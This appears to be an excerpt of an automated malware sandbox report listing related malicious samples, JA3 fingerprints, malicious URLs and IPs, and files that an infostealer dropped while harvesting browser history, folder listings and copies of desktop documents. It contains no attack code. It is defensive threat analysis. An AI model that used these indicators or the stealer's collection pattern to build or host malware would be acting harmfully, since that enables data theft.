	Bontrageroutdoors_Project_Update_202557516.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	http://diebinjmajbkhhg.top/1.php?s=527	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	https://patiooutletmaipu.cl/tiendas/head/	Get hash	malicious	LummaC, CAPTCHA Scam ClickFix, LummaC Stealer	Browse	104.21.44.66 149.154.167.220
	19d6P55zd1.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220
	9L83v5j083.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220
	y1jQC8Y6bP.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	FILHKLtCw0.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	ppISxhDcpF.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	m0CZ8H4jfl.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.44.66 149.154.167.220
	s2Jg1MAahY.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	fGu8xWoMrg.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1077
Entropy (8bit):	5.247861682261402
Encrypted:	false
SSDEEP:	24:59hqwFliZISzjAt8SG3sjzk+x6dg0ujghAPtMSv2M3qt508oS8dx8Fv:XhblkkTmsjzV6dgNjghAP7aj08oS8dxy
MD5:	5B6E9A27804B930ABB93E76F901D3AA7
SHA1:	AB9B66A7DAAFB24A4EF537BDE5EAB785D27625D7
SHA-256:	D337025FE60105E1FE80E7CB7D81AC786C563112B5F3B80ACDBE0FA19A9519BE
SHA-512:	826B9B2ABA594B8307B07B4F8BA8117A58D444EF437B3EACB875487DD07F2F847759FE8BADC560C7A2B66146ABC9A583058AA64382D95903E5F1CB526BABFC47
Malicious:	false
Preview:	Desktop\...AIXACVYBSB\...DVWHKMNFNN\...KATAXZVCPS\...KZWFNRXYKI\...MNULNCRIYC\....DTBZGIOOSO.pdf....HTAGVDFUIE.png....MNULNCRIYC.docx....NWTVCDUMOB.mp3....VLZDGUKUTZ.jpg....ZSSZYEFYMU.xlsx...NHPKIZUUSG\...NIKHQAIQAU\...PSAMNLJHZW\....AFWAAFRXKO.xlsx....AIXACVYBSB.jpg....PSAMNLJHZW.docx....VLZDGUKUTZ.mp3....XZXHAVGRAG.png....ZSSZYEFYMU.pdf...QVTVNIBKSD\....AFWAAFRXKO.jpg....MNULNCRIYC.pdf....PSAMNLJHZW.xlsx....QVTVNIBKSD.docx....TQDGENUHWP.png....ZSSZYEFYMU.mp3...TQDGENUHWP\....BPMLNOBVSB.mp3....DTBZGIOOSO.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.jpg....TQDGENUHWP.docx....UMMBDNEQBN.pdf...UOOJJOZIRH\...WKXEWIOTXI\...AFWAAFRXKO.docx...AFWAAFRXKO.jpg...AFWAAFRXKO.xlsx...AIXACVYBSB.jpg...AIXACVYBSB.xlsx...BPMLNOBVSB.mp3...desktop.ini...DTBZGIOOSO.pdf...DVWHKMNFNN.jpg...Excel.lnk...FUEvp5c8lO.exe...HTAGVDFUIE.png...KZWFNRXYKI.png...MNULNCRIYC.docx...MNULNCRIYC.pdf...NWTVCDUMOB.mp3...PSAMNLJHZW.docx...PSAMNLJHZW.xlsx...QVTVNIBKSD.docx...TQDGENUHWP.png...VLZDGUKUTZ.jpg...VLZDGUKUTZ.mp3...VLZDGUKU

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1202
Entropy (8bit):	5.353468266611494
Encrypted:	false
SSDEEP:	24:z9hqwFlhxrqEEoZISzjAt8SG3sjzk+x6gkzjghBwriv2M3s7IRitpC8oS8dx8Fv:ZhblhBqEEGkTmsjzV6gkzjghBpfRi+8X
MD5:	0799E16BEA1457DEB1A92D1CB8E5EB5C
SHA1:	2E39401324BBC0ACDA4AF36B00340C4B515F85C8
SHA-256:	07CA7A3E87B05D77F6F5493835A1BB7E6F9D555722DF56153344BC39E69322EA
SHA-512:	9EB6B6440CCFA14B1D619523929D409C4C2C175D7A8AA4121CD37BEBB4683205DC1E10461A033F0A711D12E4E25C8A92F33D5123A7732B90E9FA5AE001F9C5C4
Malicious:	false
Preview:	Documents\...AIXACVYBSB\...DVWHKMNFNN\...KATAXZVCPS\...KZWFNRXYKI\...MNULNCRIYC\....DTBZGIOOSO.pdf....HTAGVDFUIE.png....MNULNCRIYC.docx....NWTVCDUMOB.mp3....VLZDGUKUTZ.jpg....ZSSZYEFYMU.xlsx...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...NHPKIZUUSG\...NIKHQAIQAU\...PSAMNLJHZW\....AFWAAFRXKO.xlsx....AIXACVYBSB.jpg....PSAMNLJHZW.docx....VLZDGUKUTZ.mp3....XZXHAVGRAG.png....ZSSZYEFYMU.pdf...QVTVNIBKSD\....AFWAAFRXKO.jpg....MNULNCRIYC.pdf....PSAMNLJHZW.xlsx....QVTVNIBKSD.docx....TQDGENUHWP.png....ZSSZYEFYMU.mp3...TQDGENUHWP\....BPMLNOBVSB.mp3....DTBZGIOOSO.xlsx....KZWFNRXYKI.png....LTKMYBSEYZ.jpg....TQDGENUHWP.docx....UMMBDNEQBN.pdf...UOOJJOZIRH\...WKXEWIOTXI\...AFWAAFRXKO.jpg...AFWAAFRXKO.xlsx...AIXACVYBSB.jpg...BPMLNOBVSB.mp3...desktop.ini...DTBZGIOOSO.pdf...DTBZGIOOSO.xlsx...HTAGVDFUIE.png...KZWFNRXYKI.png...LTKMYBSEYZ.jpg...MNULNCRIYC.docx...MNULNCRIYC.pdf...NWTVCDUMOB.mp3...PSAMNL

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	442
Entropy (8bit):	5.279053655203046
Encrypted:	false
SSDEEP:	12:dykibifowv0LKKBhBwiALiv0hhM59ns7nI9msitpyH8oS8dx8Fv:RgkzjghBwriv2M3s7IRitpC8oS8dx8Fv
MD5:	360F1EF8F3CDA405876481DFA2BDC790
SHA1:	245A2244CDA8351565AAD7BDCAB7ECAFF8B3F608
SHA-256:	F94A77E4EEBE4A5D1455EFD122E9FB29B9940F27E4DCAC27503CEB173B64CA06
SHA-512:	4DC93ADF0A86FCAC214E301F23F7FC497FF3667C8AF9284A9E86A27E7CD3F8264E16F89F319CBAAA83DC4C51FDAA24C38B6586ED31FD572163462AE63134B2E3
Malicious:	false
Preview:	Downloads\...AFWAAFRXKO.jpg...AFWAAFRXKO.xlsx...AIXACVYBSB.jpg...BPMLNOBVSB.mp3...desktop.ini...DTBZGIOOSO.pdf...DTBZGIOOSO.xlsx...HTAGVDFUIE.png...KZWFNRXYKI.png...LTKMYBSEYZ.jpg...MNULNCRIYC.docx...MNULNCRIYC.pdf...NWTVCDUMOB.mp3...PSAMNLJHZW.docx...PSAMNLJHZW.xlsx...QVTVNIBKSD.docx...TQDGENUHWP.docx...TQDGENUHWP.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.jpg...VLZDGUKUTZ.mp3...XZXHAVGRAG.png...ZSSZYEFYMU.mp3...ZSSZYEFYMU.pdf...ZSSZYEFYMU.xlsx..

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\OneDrive.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:1hiR8LKB:14R8LKB
MD5:	966247EB3EE749E21597D73C4176BD52
SHA1:	1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
SHA-256:	8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
SHA-512:	BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
Malicious:	false
Preview:	OneDrive\...desktop.ini..

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Pictures.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	88
Entropy (8bit):	4.450045114302317
Encrypted:	false
SSDEEP:	3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
MD5:	D430E8A326E3D75F5E49C40C111646E7
SHA1:	D8F2494185D04AB9954CD78268E65410768F6226
SHA-256:	22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
SHA-512:	1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
Malicious:	false
Preview:	Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Startup.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	4.053508854797679
Encrypted:	false
SSDEEP:	3:jgBLKB:j4LKB
MD5:	68C93DA4981D591704CEA7B71CEBFB97
SHA1:	FD0F8D97463CD33892CC828B4AD04E03FC014FA6
SHA-256:	889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
SHA-512:	63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
Malicious:	false
Preview:	Startup\...desktop.ini..

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Temp.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4369
Entropy (8bit):	5.187077689089331
Encrypted:	false
SSDEEP:	96:4Y5u+6Iscp70/BF/87D/lNzchnXhdU7VGV29uWBYLdU3MX:tppo/P/otmhxm7VKb
MD5:	C1BE793D2DADEE0FF6860076012C0952
SHA1:	D0F0FA0728206587329B0B1387A788CFE3BCE3EE
SHA-256:	43636A7517D07395A7B0E45A33BDE9F21079209ABB7434D01F443BF87F7AA15C
SHA-512:	3381AF3B9CBEF441AE73FBA2D6396BBA7603C058A285B62A88420C3454C3905EB00D4C13059FE89DF121060E4EC73FB1BAA4FB0FB024BAAE1BE2338C5A11B25B
Malicious:	false
Preview:	Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 10-15-05-306.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-05 10-15-18-157.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696496927224658700_B5BF1C8A-229F-4526-A25C-D3A2E446712A.log.....App1696496950623601400_E5720893-15E4-4CB6-92FD-3EE2C61DA02F.log.....App1696496966111814000_FA0A0DA0-8B37-4EDD-B760-67C212570E83.log.....App1696496966112282200_FA0A0DA0-8B37-4EDD-B760-67C212570E83.log...edge_BITS_3784_1300403242\....c78f9967-7a8c-44b0-ad94-732b63c89638...edge_BITS_3784_1441652407\....7f41fcdb-a3ef-47d4-86cb-0f3555d3db82...edge_BITS_3784_1453829056\....873489b1-33b2-480a-baa2-641b9e09edcd...edge_BITS_3784_1689570837\....ef5f792e-9df7-4748-accf-02ec33a4a2c4...edge_BITS_3784_1726059252\....c50698d5-282c-4c8d-9fa6-c155f2d8d379...ed

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Directories\Videos.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	23
Entropy (8bit):	3.7950885863977324
Encrypted:	false
SSDEEP:	3:k+JrLKB:k+JrLKB
MD5:	1FDDBF1169B6C75898B86E7E24BC7C1F
SHA1:	D2091060CB5191FF70EB99C0088C182E80C20F8C
SHA-256:	A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
SHA-512:	20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
Malicious:	false
Preview:	Videos\...desktop.ini..

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.docx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AFWAAFRXKO.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6868290294905215
Encrypted:	false
SSDEEP:	24:hl+yWbugHn0w0RW4TAvC5oC6Rkc1ZqX+STxhexRov:hQhuTwqTAvIuOuQXVEov
MD5:	E655D05DEDA782A6FE1E44028236D3A4
SHA1:	ABEF573CA92D8CD16E5ACE5C300A6BF07DF79722
SHA-256:	69FC1A8F39F8BD7E956A4C8EC0EC6210E8F4C7E223B49C20369A2B47F8512528
SHA-512:	25837AEEB2772BF69684BDB344208188E115AA8FCB06D5428F84D2ED15F4972FC6874B128CA3682D28900F5C0EB8B305151F831962D3021EE7BBD1447DAE93F5
Malicious:	false
Preview:	AFWAAFRXKOIMYUTEBKLCFYUSMPKBLLVLYCZSBYQARRBIDNMYLPLGAIJYBPXZRRCDKWUJCZFNZYWJLJWCPPNWNBUNUKWKANAFJTGSMNDNAIPWYCCUGZTWCXIDUHLKDIIFXVZZCBKTKZXKYBFQHLHAZSPAYNVQVCNGPTZLFAFXAUGISISAIITTEUPNXLWBPAUSCWOXHRUCHKENHIUHQCSETCRINBBJCUJCYIOYZUPBJXJBLMSTCMXHMOOYHKSQGTGUNLEDPMCFDKWDGOSMWYQNXDCAOPAGZLPKXQZAOHSJXYLJUCZGAXOJOEPCWBHGGKSAPLRCJRDKCIWGATZZLSAOXFPFIENHFZCCEZCGGYAJEEPJFJLQIMPYUUETJJFOGGKKJKFAHPRMCUJNDGTXMLAAQDGEQMDULWDPCAUXZTYYGKAFFQQHIKQHEATUJZECMPTEBTRHCFGIZWCYGIGHIPVWFTPPXSNUTYHQCLGJLUYHHVMGFOMHJDNRGDZFHRGYQORTAJWLGOELYKCPIANQGCAXIZOMJZOECZGAHFWNUAKKTHLAANRBUSOZZLNWUYMXDOWPYUFYBOZZZBBJKPNMFGUCBOUWTXXWSNOBHKCPLGIWSWHHNCKLLLPPBPRJTKGRWMIZJYLWMDVWGJOTUQLYVUGUJQWNZKEUZQCQHKTCMGXBZDWEEFWYQHSYEMWFFVJUDOFEXELJGUUNXPBJCIQBKCMDGDRNTXYAXFDSLPAGXBTGBIVFXAHNXSFIPLCMCBKLQODIOGOBZMULDRUZUBRXZWXQVZCCWQVEIFCHMCTEYQXZKNSQZNYDUYGPGUQJEKUPPOTOWMMILZMISKYYGSRXUSSWEEQRNYBWLFXYWKGQPPVHKNOOXEDYWLCRNTNRKUIUKCYQNZCKIXAOIPCOTLEREPCLILYTQLFKBOOMXEVVODZEITSUPQITOXCNMSODLXIRGYOVFXWNRMVUQTMIZKKEVHOWKLXSZARGDNQKVXETZPBS

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AIXACVYBSB.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAGCATPNHNNYICDCRMTKRODUCDDFZKHLISLVOIFZPDTOSIEREFHYEWUBJKJRWXMZUGCPUXCPEXUQPWTSKEYSDPEICDQMMKUKJLDNQEHQQCYKRMWOUSJVTVSZJTFZCDVNUMEIZFWDNWCNCSCHBYNKRUSXPVMRIHGXDUPKXMZUIELSRXMZAEUNCCYZTEYLUYYRNSFUTHFESJOLGKJVGGNVJKSFSETAIHYOMLBOPRYAHSCATJUXNTWVZPEMECBVVHKHDELQRTQBEBXPJJ

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\Grabber\DRIVE-C\Users\user\Desktop\AIXACVYBSB.xlsx

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690067217069288
Encrypted:	false
SSDEEP:	12:wSQanHEC73FqjThUbJwuUn5qPyd2whRZfZOaH5KrqXzJI/y5bjbVMmRYAPL8fx7T:wHu73FWhUNwzqq2OfX82JdHRNPLcxdl
MD5:	4E32787C3D6F915D3CB360878174E142
SHA1:	57FF84FAEDF66015F2D79E1BE72A29D7B5643F47
SHA-256:	2BCD2A46D2DCED38DE96701E6D3477D8C9F4456FFAE5135C0605C8434BA60269
SHA-512:	CEC75D7CCFA70705732826C202D144A8AC913E7FCFE0D9B54F6A0D1EEC3253B6DEFFB91E551586DA15F56BA4DE8030AC23EE28B16BB80D1C5F1CB6BECF9C21BE
Malicious:	false
Preview:	AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGULFHOTUOYUSIVJEHUYPRYGESSFFMBWDPFRMTVBZEHTJSPRMDJISAZPMEWNGPGIXXTDNHCOBSXAWEFWRZNECKZGORELWMEPSAPLSTZZPUKXURSKTFSUSFEZMXMAIMRJZNGCVKLOHPVMZEIXIISXVMQHQTSADYWZQSWYVJHHONOOSZPQVWIUFMVXBXYCJOMERCQSVXERFAOOENLKARQGTECAIXOXEZPFDFJHYFCKLADMCWYOMCITRHMECVVVNPNTSRXYGYRKZUTOFNBMHDZWYHPYLTWEIGWOIGBTHWYGIXBCUDYMZMTZNYQMZLMXKPNFZDUEXXQLFJZZZVOPBEZKTKTJCTNUPRCNNGCPTIHKPTGBJLGUENNUGTZVMZJGQGUVBRLOJZECBLINEKGSIRFWZPWMVYJNEPWGYIAHKMJRBZMRVIBPONMHBDQZYFBHDDMYBZZAFEPAQFFUPIGGYNSPVXUWNNCWAUZXAG